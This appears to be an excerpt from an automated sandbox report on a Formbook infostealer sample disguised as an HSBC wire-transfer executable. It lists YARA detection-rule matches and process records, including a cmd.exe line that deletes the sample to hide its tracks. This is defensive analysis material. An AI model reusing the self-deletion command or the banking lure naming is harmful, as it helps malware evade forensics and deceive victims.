                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    General

                    Start time:18:57:17
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:57:18
                    Start date:25/11/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis
